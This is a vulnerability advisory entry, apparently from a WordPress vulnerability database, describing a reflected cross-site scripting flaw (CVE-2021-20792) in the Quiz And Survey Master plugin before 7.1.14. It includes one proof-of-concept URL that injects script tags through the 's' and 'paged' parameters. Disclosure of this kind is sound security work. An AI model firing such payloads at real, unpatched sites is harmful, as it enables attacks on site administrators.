Lucene search
WpvulndbWPEX-ID:4DEB3464-00ED-483B-8D91-F9DFFE2D57CFHistoryAug 10, 2021 - 12:00 a.m.
Quiz And Survey Master < 7.1.14 - Reflected Cross-Site Scripting
2021-08-1000:00:00
wpvulndb
75
0.002 Low
EPSS
Percentile
60.8%
The plugin does not sanitise or escape the ‘s’ and paged GET parameter before outputting them in attributes, leading to Reflected Cross-Site Scripting issues
https://example.com/wp-admin/admin.php?page=mlw_quiz_list&s="><script>alert(/XSS-s/)</script>&paged="><script>alert(/XSS-paged/)</script>References
Related
cve
cve
CVE-2021-20792
2021-08-18 06:15:07
prion
prion
Cross site scripting
2021-08-18 06:15:00
cvelist
cvelist
CVE-2021-20792
2021-08-18 05:36:26
wpvulndb
wpvulndb
Quiz And Survey Master < 7.1.14 - Reflected Cross-Site Scripting
2021-08-10 00:00:00
nvd
nvd
CVE-2021-20792
2021-08-18 06:15:07
nuclei
nuclei
WordPress Quiz and Survey Master <7.1.14 - Cross-Site Scripting
2022-02-04 19:16:00
jvn
jvn